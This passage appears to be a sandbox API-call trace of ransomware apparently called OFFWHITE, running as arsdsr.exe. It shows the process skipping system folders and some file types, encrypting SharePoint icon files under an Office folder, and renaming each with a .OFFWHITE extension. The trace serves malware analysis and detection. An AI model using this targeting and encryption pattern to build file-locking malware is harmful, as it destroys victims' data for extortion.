RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e9e0 [0144.417] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.418] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=25214) returned 1 [0144.418] GetProcessHeap () returned 0x500000 [0144.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.418] GetProcessHeap () returned 0x500000 [0144.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.418] GetProcessHeap () returned 0x500000 [0144.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.418] GetProcessHeap () returned 0x500000 [0144.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.418] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.418] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.419] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.419] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.419] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.419] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.419] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.419] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.419] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x627e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.419] SetLastError (dwErrCode=0x0) [0144.419] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] GetLastError () returned 0x0 [0144.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x637e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.423] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x647e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.423] WriteFile (in: hFile=0x21c, lpBuffer=0x52e9e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e9e0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.423] GetProcessHeap () returned 0x500000 [0144.423] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x627e) returned 0x5607c8 [0144.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x627e, lpOverlapped=0x0) returned 1 [0144.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.426] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x627e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x627e, lpOverlapped=0x0) returned 1 [0144.427] GetProcessHeap () returned 0x500000 [0144.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.427] CloseHandle (hObject=0x21c) returned 1 [0144.427] GetProcessHeap () returned 0x500000 [0144.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.427] GetProcessHeap () returned 0x500000 [0144.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.427] GetProcessHeap () returned 0x500000 [0144.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.427] GetProcessHeap () returned 0x500000 [0144.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.427] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" [0144.427] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.OFFWHITE" [0144.427] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico.offwhite")) returned 1 [0144.428] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2=".") returned 1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="..") returned 1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="...") returned 1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="windows") returned -1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="$recycle.bin") returned 1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="rsa") returned 1 [0144.428] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="ntuser.dat") returned 1 [0144.429] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="programdata") returned 1 [0144.429] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="appdata") returned 1 [0144.429] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="program files") returned 1 [0144.429] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="program files (x86)") returned 1 [0144.429] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.429] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="SharePointPortalSite.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" [0144.429] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.429] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.429] PathFindExtensionW (pszPath="SharePointPortalSite.ico") returned=".ico" [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.429] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.429] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.430] GetProcessHeap () returned 0x500000 [0144.430] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e9f0 [0144.430] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.436] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=25214) returned 1 [0144.436] GetProcessHeap () returned 0x500000 [0144.436] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.436] GetProcessHeap () returned 0x500000 [0144.436] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.436] GetProcessHeap () returned 0x500000 [0144.436] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.436] GetProcessHeap () returned 0x500000 [0144.436] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.436] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.436] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.436] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.436] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.436] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.436] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.436] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.436] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.436] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.437] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.437] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.437] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x627e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.437] SetLastError (dwErrCode=0x0) [0144.437] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.439] GetLastError () returned 0x0 [0144.439] GetLastError () returned 0x0 [0144.439] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x637e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.439] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.439] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x647e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.439] WriteFile (in: hFile=0x21c, lpBuffer=0x52e9f0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e9f0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.439] GetProcessHeap () returned 0x500000 [0144.439] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x627e) returned 0x5607c8 [0144.439] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.440] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x627e, lpOverlapped=0x0) returned 1 [0144.442] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.442] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x627e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x627e, lpOverlapped=0x0) returned 1 [0144.442] GetProcessHeap () returned 0x500000 [0144.442] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.442] CloseHandle (hObject=0x21c) returned 1 [0144.442] GetProcessHeap () returned 0x500000 [0144.442] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.442] GetProcessHeap () returned 0x500000 [0144.442] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.442] GetProcessHeap () returned 0x500000 [0144.442] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.443] GetProcessHeap () returned 0x500000 [0144.443] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.443] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" [0144.443] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.OFFWHITE" [0144.443] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico.offwhite")) returned 1 [0144.443] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2=".") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="..") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="...") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="windows") returned -1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="$recycle.bin") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="rsa") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="ntuser.dat") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="programdata") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="appdata") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="program files") returned 1 [0144.444] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="program files (x86)") returned 1 [0144.444] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.444] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="SharePointTeamSite.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" [0144.444] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.444] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.444] PathFindExtensionW (pszPath="SharePointTeamSite.ico") returned=".ico" [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.444] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.445] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.445] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.445] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.445] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.445] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.445] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.445] lstrcmpiW (lpString1="SharePointTeamSite.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.445] GetProcessHeap () returned 0x500000 [0144.445] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea00 [0144.445] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.446] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=25214) returned 1 [0144.446] GetProcessHeap () returned 0x500000 [0144.446] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.446] GetProcessHeap () returned 0x500000 [0144.446] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.446] GetProcessHeap () returned 0x500000 [0144.446] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.446] GetProcessHeap () returned 0x500000 [0144.446] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.446] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.446] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.446] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.447] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.447] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.447] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.447] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.447] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.447] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.447] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.447] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.447] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.447] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x627e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.447] SetLastError (dwErrCode=0x0) [0144.447] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.450] GetLastError () returned 0x0 [0144.450] GetLastError () returned 0x0 [0144.450] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x637e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.450] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.450] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x647e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.450] WriteFile (in: hFile=0x21c, lpBuffer=0x52ea00*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52ea00*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.450] GetProcessHeap () returned 0x500000 [0144.450] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x627e) returned 0x5607c8 [0144.451] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.451] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x627e, lpOverlapped=0x0) returned 1 [0144.454] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.454] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x627e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x627e, lpOverlapped=0x0) returned 1 [0144.455] GetProcessHeap () returned 0x500000 [0144.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.455] CloseHandle (hObject=0x21c) returned 1 [0144.455] GetProcessHeap () returned 0x500000 [0144.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.455] GetProcessHeap () returned 0x500000 [0144.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.455] GetProcessHeap () returned 0x500000 [0144.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.455] GetProcessHeap () returned 0x500000 [0144.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.455] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" [0144.455] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.OFFWHITE" [0144.455] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.OFFWHITE" (normalized: "c:\\users\\all 